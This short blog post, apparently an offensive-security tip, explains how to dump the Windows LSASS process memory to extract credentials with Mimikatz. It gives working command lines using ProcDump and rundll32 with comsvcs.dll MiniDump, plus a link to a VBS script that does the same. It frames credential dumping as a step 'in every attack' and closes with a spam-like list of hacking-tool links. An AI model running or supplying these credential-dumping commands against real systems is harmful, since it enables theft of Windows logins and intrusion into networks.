In every attack we need to get the windows credentials, this super important task. We need to target "LSASS.EXE" process and dump the process memory so that we can use it for extracting credentials using Mimikatz.
Here are some of the important methods,
Using ProcDump :
1. Favorite method of dumping is using "procdump.exe". This tool is from Microsoft Pstools
2. Download ProcDump.exe and upload in on remote system
3. Command : "procdump -ma lsass.exe lsass.dmp"
Using VB Script :
Download script from here :
https://drive.google.com/open?id=1jwy40ykrdEHWB1sddZ-Q5USDX9OOPOPp
rundll32 Command :
Essentially previous method VBS script is using following command for dumping Lsass.exe process
rundll32 C:\windows\system32\comsvcs.dll, MiniDump 992 C:\Users\Public\lsass.bin full
So in case you do not have VB Script with you still you can fire-up the command and dump LSASS process.
Related news
- Hack Tools For Mac
- Pentest Reporting Tools
- Hack Tools Online
- Hacking Tools Usb
- Hacker Tool Kit
- Hacker Tools List
- Hacker Tools Linux
- Hacking Tools For Windows 7
- Tools Used For Hacking
- Hacker Tools
- Hacking Tools Windows 10
- Pentest Tools List
- Hacking Tools For Games
- Hack Tools For Pc
- Pentest Tools Find Subdomains
- Hacker Search Tools
- Hacker Tools For Pc
- Hacking Tools For Games
- Ethical Hacker Tools
- Hacker Tools Apk
- Easy Hack Tools
- Hacker Tools For Mac
- Hack Website Online Tool
- Hacking Tools 2019
- Hacker Tools Free Download
- Usb Pentest Tools
- Hacker Tools Mac
- Hacker Tools Mac
- Hack Tools Github
No comments:
Post a Comment